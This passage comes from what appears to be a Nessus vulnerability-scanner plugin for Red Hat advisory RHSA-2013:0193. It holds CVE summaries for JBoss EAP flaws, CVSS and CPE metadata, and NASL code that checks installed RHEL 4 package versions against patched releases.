If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://access.redhat.com/security/cve/cve-2012-0874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5478\"\n );\n # https://access.redhat.com/knowledge/docs/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0193\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:netty\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0193\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL4\", rpm:\"jbossas-client-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL4\", reference:\"aopalliance-1.0-5.2.jdk6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"bsh2-2.0-0.b4.15.1.patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"bsh2-bsf-2.0-0.b4.15.1.patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"google-guice-2.0-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-3.3.2-1.6.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-annotations-3.4.0-3.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", 
reference:\"hibernate3-entitymanager-3.4.0-4.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-javadoc-3.3.2-1.6.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-search-3.1.1-2.3.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-search-javadoc-3.1.1-2.3.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hornetq-2.2.24-1.EAP.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"javassist-3.12.0-6.SP1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cache-pojo-3.0.1-1.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cl-2.0.11-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-common-beans-1.0.1-2.1.Final.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-common-core-2.2.21-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el4\")) flag++;\n if 
(rpm_check(release:\"RHEL4\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-interceptors-1.0.9-0.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-transactions-1.0.2-1.4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-javaee-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-javaee-poms-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", 
reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jpa-deployers-1.0.0-6.SP2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-messaging-1.4.8-12.SP9.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-naming-5.0.3-5.CP02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-reflect-2.0.4-2.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-docs-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-examples-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-runtime-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", 